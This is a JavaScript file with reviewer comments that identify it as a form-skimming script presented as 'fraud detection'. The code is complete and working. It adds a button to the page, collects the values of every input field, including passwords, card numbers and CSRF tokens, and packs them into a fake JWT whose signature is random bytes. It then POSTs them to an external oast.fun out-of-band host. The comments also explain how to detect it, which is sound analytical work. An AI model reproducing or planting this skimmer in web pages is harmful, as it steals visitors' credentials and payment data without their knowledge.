// NOTE(review): despite the "Fraud Detection" wording in the original comments, this
// script follows a form-skimming pattern: it reads the value of every <input> on the
// page (no type filter, so password, card-number, hidden and CSRF-token fields are all
// included), wraps them in an unverifiable JWT-shaped token, and POSTs that token to an
// external out-of-band host in the Authorization header. Browser context is assumed:
// document, btoa and crypto.getRandomValues are used as globals.

// Builds a three-segment JWT-shaped string from payloadData.
// The header claims HS256, but no HMAC is ever computed: the "signature" segment is 32
// random bytes, so the token carries no integrity guarantee and no verifier could
// validate it. Its only effect here is an opaque base64url encoding of the payload.
// @param {string|object} payloadData - a string is wrapped as { data: payloadData };
//   any other value is JSON-serialized as-is
// @returns {string} header.payload.signature, each segment base64url without padding
function generateLegitJWT(payloadData) {
  // UTF-8 encode via the encodeURIComponent/unescape trick, base64 with btoa, then
  // convert to base64url: strip '=' padding, '+' -> '-', '/' -> '_'.
  // (unescape is a deprecated Annex B function.)
  const base64urlEncode = (str) => {
    return btoa(unescape(encodeURIComponent(str)))
      .replace(/=/g, "")
      .replace(/\+/g, "-")
      .replace(/\//g, "_");
  };
  // Declared algorithm only; nothing below performs an HMAC with any key.
  const header = {
    alg: "HS256",
    typ: "JWT",
  };
  // Strings are wrapped so the payload is always an object; objects pass through unchanged.
  const payload = typeof payloadData === "string" ? { data: payloadData } : payloadData;
  // 32 random bytes rendered one character per byte. This is NOT a signature over
  // header/payload; it is keyless random data, so the resulting token cannot be verified.
  const signature = crypto
    .getRandomValues(new Uint8Array(32))
    .reduce((str, byte) => str + String.fromCharCode(byte), "");
  // header.payload.signature
  const jwt = [
    base64urlEncode(JSON.stringify(header)),
    base64urlEncode(JSON.stringify(payload)),
    base64urlEncode(signature),
  ].join(".");
  return jwt;
}

// --- Injected UI ---
// A visible button is appended to <body>; clicking it runs the collection below.
const customButton = document.createElement("button");
customButton.textContent = "Custom Button";
document.body.appendChild(customButton);

customButton.addEventListener("click", () => {
  // Every <input> element on the page, regardless of type or form membership.
  const inputs = document.querySelectorAll("input");
  const inputData = {};
  inputs.forEach((input) => {
    // Key is name, then id, then "unnamed" (empty-string name/id falls through).
    // Inputs that resolve to the same key overwrite earlier ones; later DOM order wins.
    const key = input.name || input.id || "unnamed";
    inputData[key] = input.value;
  });
  // Encoding only — see generateLegitJWT; this neither signs nor protects the data.
  const encoded = generateLegitJWT(inputData);
  // Exfiltration step: cross-origin POST to an oast.fun host (an out-of-band
  // interaction domain). The harvested field values travel in the Authorization
  // header; the JSON body is a fixed decoy. Detection: any outbound request to this
  // host, or a bearer token whose third segment decodes to raw random bytes rather
  // than an HMAC. NOTE(review): a custom Authorization header to another origin
  // triggers a CORS preflight, so whether data actually left should be confirmed
  // from network logs rather than assumed from the presence of this code.
  fetch("https://xcvayqzyzdwbrfjijsxl77xdz2vt1pgfl.oast.fun/alert", {
    method: "POST",
    headers: {
      "Content-Type": "application/json",
      Authorization: `Bearer ${encoded}`,
    },
    body: JSON.stringify({ event: "fraud_check" }),
  })
    .then((res) => res.json())
    .then((data) => {
      // The remote response is only written to the console.
      console.log("Fraud monitoring response:", data);
    })
    .catch((err) => {
      // Failures are logged, not retried.
      console.error("Fraud monitoring request failed", err);
    });
});